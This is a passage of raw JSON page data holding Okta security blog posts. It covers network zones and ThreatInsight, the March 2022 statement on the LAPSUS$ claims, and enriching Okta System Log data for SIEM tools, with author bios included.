Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1czREiHfXmY6LFeVrvLIZE\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine - for illustrative purposes only\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Administrators can configure a network zone by IP (or IP range), which is useful when allowlisting trusted network locations, for example, or denying requests from IPs known to be untrustworthy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/network/create-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" go one step further. These zones are based on a dynamic evaluation of IP attributes, such as what country, organization, or Autonomous System Number (ASN) / Internet Service Provider (ISP) is associated with an IP, whether the IP is associated with known proxies such as TOR, or whether those proxies attempt to anonymize the true source of the request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network zones can be taken into account prior to authentication, during authentication, or at any other time the security context of a session is re-evaluated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Pre-authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network attributes can first be evaluated during pre-authentication: that is, when a user attempts to load an Okta sign-in page in their browser. Administrators can configure a network zone to limit access to their sign-in page to the trusted locations they expect users to sign-in from.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An organization might choose to block access requests from anonymizing proxies, or from ASNs with a poor reputation, or from high-risk countries where they don’t expect to have any legitimate users at pre-authentication. 
But this approach is less ideal when you need to provision access by exception - such as to a handful of legitimate users in a country or from an ASN where you ordinarily wouldn’t conduct business.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You might, for example, have a small set of known users with a legitimate reason to authenticate from a country that you would otherwise consider risky. In these circumstances, network zones can be evaluated \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"during\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An administrator might, for example, require that users authenticating from a specific network zone(s) meet an additional set of security requirements beyond those authenticating from a trusted network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4swlqRJD34OqT5GHXmBs2B\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine - for illustrative purposes only\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta allows for these use-cases to be managed through group membership or user and device attributes. Policies can then require these users to present higher assurance factors (such as those that are device bound, hardware protected, or otherwise phishing resistant). 
Or they might be limited to only authenticating from a known, registered or managed device, and/or from a device that exhibits specific device posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators may also take an “adaptive” approach - applying a differentiated set of access conditions based on an evaluation of risk. How risk scores are calculated varies by organization: Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/risk-events/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Risk Events API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allows admins to factor in risk scores derived from external signals, such as their third-party security partners. “Out of the box” scores are determined by evaluation of both network reputation and any \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/proc-security-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"changes in user or device behavior\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (new device, new location, new IP, impossible travel, or other factors).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators can use this breadth of policy and authenticator options to develop “zero trust” access policies from a single control plane. 
A zero trust approach to security requires a “trust, but verify” approach around any single attribute.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What does that mean in practice?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We should anticipate a small number of users will choose common passwords and re-use them. Okta allows admins to deny common passwords and apply strong password policies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We should anticipate that even strong passwords will be reused and occasionally stolen. Okta applies rate limiting controls on authentication endpoints and allows admins to protect accounts using multifactor authentication.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We should anticipate attackers will attempt to anonymize or spoof their location. 
Okta provides admins a broad mix of complementary attributes to assess in access policies: everything from behavior detection to device context, high assurance factors and integrations with third party security providers.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While typically network zones are configured in the Okta administration console, they can also be programmatically managed using Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/zones/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Zones API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". The API provides the ability to poll, create and update network zones. This comes in handy when updating larger sets of IPs across multiple network zones using intelligence gleaned from outside Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modern internet infrastructure is highly ephemeral, with many IP addresses being rapidly assigned and reassigned to users and devices. Because of this, determining the reputation of any given IP is relatively dynamic and highly contextual. Okta will only block an IP address globally where malicious intent can be inferred with high confidence. We strongly recommend organizations complement it with their own blocklists.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This shapeshifting environment requires a defensive approach that can rapidly assign reputation to an IP as soon as it is observed in attacks. 
That’s where Okta’s ThreatInsight – and machine learning more generally – can play a role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/about-threatinsight.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is a default security capability available to every Okta customer that is designed to detect and block high-volume credential-based attacks that target Okta endpoints.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight uses heuristics and machine learning to recognise common password spraying, credential stuffing and similar brute-force attacks. Importantly, it harnesses the network effect of the many millions of authentication requests made to thousands of Okta orgs on any given day to provide currency to the reputation of any given IP.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The capability offers a security baseline for all Okta customers, with minimal configuration required. 
An Okta admin simply selects enforce mode in the Okta Admin Console to automatically deny requests identified as malicious at pre-authentication, or audit mode to tag the malicious request with a higher risk score during authentication or to generate alerts in your SIEM/SOAR.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security is a Team Sport\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Identity Cloud can assess all of this context from one control plane and intuitive administration console. But we also view zero trust security as a “team sport”. Okta deliberately constrains our assessment of IP reputation to behaviors observed across the Okta Identity Cloud and the intelligence we consume from trusted partners.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your security and threat teams have a much better understanding of your cloud and data usage patterns, including your use of Okta. The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/risk-events/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Risk Events API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" offers an ability for administrators to ingest signals from other sources of risk data: such as network service providers with broader visibility, partners that assess risk across an entire Content Delivery Network, specialist providers of bot management services, or data collected by customers themselves. 
These can augment native Okta capabilities and give customers a larger set of data from which to evaluate the risk of any given request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This open and neutral approach and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2021/04/oktane21-introducing-oktas-new-risk-ecosystem-api-a-fraud-fighting-toolset\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"partnerships\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with other best-of-breed providers offers the best opportunity for you to provide users with frictionless access to applications and data using a least privilege model across both user and network identities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chris Niggel contributed to this article\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:52:26.059Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2022/03/official-okta-statement-lapsus-claims","id":"a5c2edd5-db0a-59ee-b411-b0e5d34c99c9","title":"Official Okta Statement on LAPSUS$ Claims","date":"2022-03-22T09:22:26+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last updated: 03/22/2022 12.00pm, Pacific Time\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Please note - Following this update all further information will be published at: \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta service has not been breached and remains fully operational. There are no corrective actions that need to be taken by our customers. In January 2022, Okta detected an unsuccessful attempt to compromise the account of a customer support engineer working for a third-party provider. 
As part of our regular procedures, we alerted the provider to the situation, while simultaneously terminating the user’s active Okta sessions and suspending the individual’s account. Following those actions, we shared pertinent information (including suspicious IP addresses) to supplement their investigation, which was supported by a third-party forensics firm.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Following the completion of the service provider’s investigation, we received a report from the forensics firm this week. The report highlighted that there was a five-day window of time between January 16-21, 2022, where an attacker had access to a support engineer’s laptop. This is consistent with the screenshots that we became aware of yesterday.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The potential impact to Okta customers is limited to the access that support engineers have. These engineers are unable to create or delete users, or download customer databases. Support engineers do have access to limited data - for example, Jira tickets and lists of users - that were seen in the screenshots. Support engineers are also able to facilitate the resetting of passwords and Multi Factor Authentication for users, but are unable to obtain those passwords.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are actively continuing our investigation, including identifying and contacting those customers that may have been impacted. There is no impact to Auth0 customers, and there is no impact to HIPAA and FedRAMP customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We take our responsibility to protect and secure our customers' information very seriously. 
We are deeply committed to transparency and will communicate additional updates when available.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Update (3/22/2022 2.15am, Pacific Time):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In late January 2022, Okta detected an attempt to compromise the account of a third-party customer support engineer working for one of our sub-processors.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The matter was investigated and contained by the sub-processor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We believe the screenshots shared online are connected to this January event. Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:47:43.253Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. 
He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2022/06/unlocking-mystery-700-okta-system-log-events","id":"7b9d9959-811f-52fd-815e-bf1a1f79dfd7","title":"Unlocking the Mystery of 700+ Okta System Log Events","date":"2022-06-01T04:01:21+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Update 06-21-2022: Eleven new System Log events have been added to the \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/tree/Development\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Github project\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to bring the total number of cataloged events to a lucky 777.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When I started writing this post, there were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"766 potential System Log types\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" 
that can appear in System Log, the logging platform in every Okta administrative console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By the time I finished it, there were 768. Things move fast in the cloud.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While the most important of these events are well documented already, the significance of others are only understood when you \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"look them up\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". There must be an easier way to enrich this data!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sending System Logs to a SIEM\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The native way to leverage Okta’s System Log is via the Okta Admin console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta offers numerous ways that System Log can be streamed, exported or programmatically queried. Many Okta customers send the log entries to their log management or SIEM of choice. These logs are provided in nicely formatted nested JSON. 
System Logs can either be ingested using the Okta System Log API or streamed using Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Streaming\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" service, and specific logs can also be sent to an external service using Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/concepts/event-hooks/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Hook\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" feature. Partners like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://databricks.com/blog/2022/04/07/analyzing-okta-logs-with-databricks-lakehouse-platform-to-detect-unusual-activity.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Databricks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have published blog entries on ingesting System Log data, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/Azure/Azure-Sentinel/blob/master/DataConnectors/Okta%20Single%20Sign-On/AzureFunctionOktaSSO_V2/AzureFunctionOktaSSO/run.ps1\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/ingestion/parser-list/okta_changelog\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have published Okta System Log connectors. 
Splunk has an entire \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://splunkbase.splunk.com/app/3682/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technical Add-On\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" devoted to Okta System Log, complete with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.splunk.com/Documentation/CIM/5.0.1/User/Overview\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Common Information Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" mapping.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Do You Use System Log?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve published a number of resources about Okta System Log to help customers understand the more important entries for security monitoring and common administrative tasks. 
For example, we have \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"write-ups\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on the events emitted by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/ti-index.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and on events that can be used to monitor for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/System-Log-queries-for-attempted-account-takeover?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"account takeover attempts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/global-search/%40uri?language=en_US#q=system%20log&t=Support&f:ContentTypeFacet=[Knowledge%20base]\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"search link\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" will allow you to see all Okta Knowledge Base articles that reference System Log - there are plenty more gems in there.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enriched System Log = Added Value\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many SIEM, security analytics, and log management solutions have ways of adding enrichment to events, either upon ingestion or upon query. 
Elastic does this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://medium.com/@carlosrpjunior/logstash-enrich-documents-using-data-from-different-index-615f67141981\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"upon ingestion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Microsoft Sentinel has the concept of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.microsoft.com/en-us/azure/sentinel/watchlists\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"watchlists\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and IBM’s QRadar provides \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.ibm.com/docs/en/qradar-on-cloud?topic=qradar-types-reference-data-collections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"reference data sets\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Google Chronicle offers both: via references or directly in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/ingestion/parser-list/supported-default-parsers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"parser\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" during ingestion - more about this later.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.splunk.com/Documentation/SplunkCloud/latest/Knowledge/Aboutlookupsandfieldactions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.sumologic.com/05Search/Search-Query-Language/Search-Operators/lookup\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sumo Logic\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" call this functionality “lookup tables”. Since Okta maintains a Technical Add-On for Splunk (TA), I thought it might be helpful to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/tree/Development\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"extend the existing TA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to leverage a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/blob/Development/lookups/okta_system_log_lookup.csv\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom .csv lookup\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that provides significant additional enrichment to System Logs as you search them in Splunk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While this is designed for Splunk, the same methodology – and the same .csv file – should be applicable to many other SIEM/log management solutions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An important note!\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Splunk is, at the time of this writing, taking over responsibility from Okta for the Technical Add-On for Splunk. Once this new TA releases in the next month or two, I will evaluate it, and ensure that the .csv file above remains compatible, at which point I will update this post. 
